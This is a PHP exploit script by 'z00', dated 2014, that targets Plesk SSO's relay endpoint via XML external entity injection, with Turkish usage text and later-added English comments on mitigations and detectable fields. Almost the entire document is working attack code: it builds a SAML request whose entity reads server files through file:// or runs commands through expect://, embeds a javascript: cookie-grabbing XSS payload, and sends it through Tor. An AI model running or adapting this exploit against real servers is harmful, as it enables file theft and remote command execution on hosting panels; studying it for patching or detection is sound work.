z00

Plesk SSO XXE injection remote exploit by z00

z00
Jun 12th, 2014
  1. <?php
  2.  
  3. /*
  4.  
  5. ████████████████████████████
  6. █______¶¶¶¶¶¶______________█
  7. █____¶¶¶¶¶¶¶¶¶¶____________█
  8. █___¶¶¶¶¶¶¶¶¶¶¶¶¶__________█
  9. █__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________█
  10. █_¶¶¶¶¶¶¶______¶¶¶_________█
  11. █_¶¶¶¶¶¶________¶¶__¶¶_____█
  12. █_¶¶¶¶¶¶____________¶¶¶____█
  13. █_¶¶¶¶¶_____________¶¶¶¶¶¶_█
  14. █_¶¶¶¶¶____________¶¶¶¶¶¶¶_█
  15. █_¶¶¶¶¶___________¶¶¶¶¶¶¶__█
  16. █_¶¶¶¶¶____________¶¶¶¶¶¶__█
  17. █_¶¶¶¶¶_____________¶¶¶¶¶¶_█
  18. █_¶¶¶¶¶¶____________¶¶¶_¶¶_█
  19. █__¶¶¶¶¶¶______¶¶___¶¶_____█
  20. █__¶¶¶¶¶¶¶____¶¶¶__________█
  21. █___¶¶¶¶¶¶¶¶¶¶¶¶___________█
  22. █____¶¶¶¶¶¶¶¶¶¶____________█
  23. █_____¶¶¶¶¶¶¶______________█
  24. ████████████████████████████
  25.  
  26. Plesk SSO XXE injection (Old bug) Exploit
  27. Coded by z00 (electrocode)
  28. Twitter: electrocode
  29. Test video: http://www.youtube.com/watch?v=G6ft9odXcuU
  30. PacketStorm added : http://packetstormsecurity.com/files/127078/Plesk-10.4.4-11.0.9-XXE-Injection.html
  31. Not: Tor kurulu değilse  proxy kismini kaldirin
  32.  
  33. Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss
  34.  
  35.  
  36. Tüm İslam Aleminin Beraat gecesi mubarek olsun dua edin:)
  37.  
  38. */
  /**
   * Builds one XXE-bearing SAML AuthnRequest and POSTs it to a Plesk SSO relay endpoint.
   *
   * The defect being exercised lives server-side: the relay's XML parser resolves the
   * external entity declared in the DOCTYPE below. The parser-side mitigation is to never
   * process DTDs / external entities (no LIBXML_NOENT, and libxml_disable_entity_loader()
   * on PHP < 8); the PacketStorm title in the file header lists Plesk 10.4.4-11.0.9 as the
   * affected range, so a patched panel is the product-side fix.
   *
   * @param string $domain  target hostname; also resolved with gethostbyname() below
   * @param string $komut   path or command interpolated into the entity's SYSTEM URI
   * @param string $method  "cmd" (expect:// wrapper, needs the Expect extension on the server,
   *                        as the usage text says) or "read" (file://); any other value behaves like "read"
   * @return string         human-readable report: encoded payload size, resolved IP and the raw response body
   */
  39. function Gonder($domain,$komut,$method){
  40.     switch($method)
  41.     {
  42.     case "cmd":
  43.     $komut = "expect://$komut";
  44.     break;
  45.     case "read":
  46.     $komut = "file://$komut";  
  47.     break;
  48.     default:
  49.     $komut = "file://$komut"; // identical to "read": an unknown method name is not rejected, it silently reads a file
  50.    
  51.     }
  52.  
  53. $adres = "https://$domain:8443/relay"; // Plesk SSO relay endpoint on the panel port
  // The DOCTYPE declares the external entity; &xxe; is referenced in <saml:Issuer> and <UI><URL>,
  // and the Destination attribute carries a javascript: URL (the XSS half mentioned in the header link).
  // ID, DigestValue and SignatureValue are fixed literals, so the relay presumably never checks the
  // signature against this request; those constants, the UA string below and response_url=http://hax
  // are stable fields a WAF/IDS signature can key on.
  54. $paket = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><!DOCTYPE doc [ <!ENTITY xxe SYSTEM \"$komut\"> ] >
  55. <samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"dff578c3049f5ba10223df820123fcccbc134e7520\" Version=\"2.0\" IssueInstant=\"2014-05-08T11:58:33Z\" Destination=\"javascript:prompt(document.domain,document.cookie)\"> <saml:Issuer>&xxe;</saml:Issuer> <samlp:Extensions> <UI><URL>&xxe;</URL></UI> </samlp:Extensions> <ds:Signature xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\"> <ds:SignedInfo><ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/> <ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/> <ds:Reference URI=\"#dff578c3049f5ba10223df820123fcccbc134e7520\"><ds:Transforms><ds:Transform Algorithm=\"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"/><ds:Transform
  56. Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/></ds:Transforms><ds:DigestMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#sha1\"/><ds:DigestValue>5BWiyX9zvACGR5y+NB2wxuXJtJE=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>S4LhCUOB0ylT4cjXUVAbnvrBjBBzybaxvWHTGw9JnRsyUB1MetRK+VHvV/M3Q4NX0DGUNFXlCZR3sM2msQOAhbjZxkKQCNUBig56/03pgsXlpWJFhnBL8m0sRRZBduf4QdHn/hxxyvAKzadPQ5nmIPmCPpO1CQsRUTMrt/13VIE=</ds:SignatureValue> </ds:Signature></samlp:AuthnRequest>";
  57.  
  58. $exploit = urlencode(base64_encode($paket)); // SAML HTTP-POST binding encoding: base64, then URL-encoded
  59. $relaystate = gethostbyname($domain); // resolves the target to its IP (returns the input unchanged if resolution fails)
  60. $relayadres = urlencode(base64_encode($relaystate)); // the IP goes back to the server as RelayState
  61. $postlar = "SAMLRequest=$exploit&response_url=http://hax&RelayState=$relayadres&RefererScheme=https&RefererHost=https://$domain:8443&RefererPort=8443"; // hand-built form body; nothing here is escaped beyond the two base64 values
  62.  
  63.  
  64. $ch = curl_init();
  65. curl_setopt($ch, CURLOPT_URL,$adres);
  66. curl_setopt($ch, CURLOPT_POST, 1);
  67. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13'); // fixed, dated UA string: easy to match in access logs
  68. curl_setopt($ch, CURLOPT_REFERER,$adres); // Referer equals the target URL itself
  69. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); // panel certificate is not verified (hostname check off)
  70. //Proxy: routes through a local SOCKS5 listener on 9050 (Tor's default port, see the Turkish note in the header);
  //       without a listener there curl_exec() below fails and the report shows an empty result
  71. curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050");
  72. curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  73. //Proxy end
  74. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);  // peer verification off as well: any TLS interception goes unnoticed
  75. curl_setopt($ch, CURLOPT_POSTFIELDS,$postlar );
  76. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // body is returned from curl_exec() instead of being echoed
  77. $sonuc = curl_exec ($ch); // false on transport error; curl_error() is never consulted, so failures look like an empty "Sonuc"
  78. curl_close ($ch);
  79. $gelenpaket = //"Paket: " . $postlar . // (disabled: the raw POST body is not included in the report)
  80.                     "Gonderilen Paket Boyutu: " . strlen($exploit)."\nRelayAdres: $relaystate\nSonuc: \r\n\r\n$sonuc \n";                  // "sent packet size" = length of the encoded SAMLRequest, not of the XML
  81. return $gelenpaket;
  82. }
  83.  
  // CLI entry point: $argc/$argv are only populated under the CLI SAPI.
  // Expects three positional arguments: domain, path-or-command, method.
  84. if($argc < 4){
  85. $kullanim =  "########################################################################\n"; 
  86. $kullanim .= "Plesk XXE Exploit Tool by z00\n";
  // Turkish usage text: "Kullanimi" = usage. BUG: $argv[0] already contains the script name, so ".php" is printed twice.
  87. $kullanim .= "Kullanimi : php $argv[0].php domain /etc/passwd read                          \n";
  // The placeholders in this example do not follow the real argument order (domain, path/command, method).
  88. $kullanim .= "Example : php $argv[0].php adres cmd (only expect installed) method      \n";
  // "Kullanilabilir Methodlar" = available methods; "Expect kurulu ise" = if Expect is installed; "Dosya okur" = reads a file.
  89. $kullanim .= "Kullanilabilir Methodlar : \ncmd (Expect kurulu ise)\nread (Dosya okur)  \n";
  90. $kullanim .= "########################################################################\r\n";
  91.  echo $kullanim;
  92. } else {
  93. $domain = $argv[1];
  94. $komut = $argv[2];
  95. $method = $argv[3]; // not validated here; Gonder() treats anything other than "cmd" as a file read
  96. echo Gonder($domain,$komut,$method); // prints the report string returned by Gonder()
  97.  
  98. }
  99.  
  100. ?>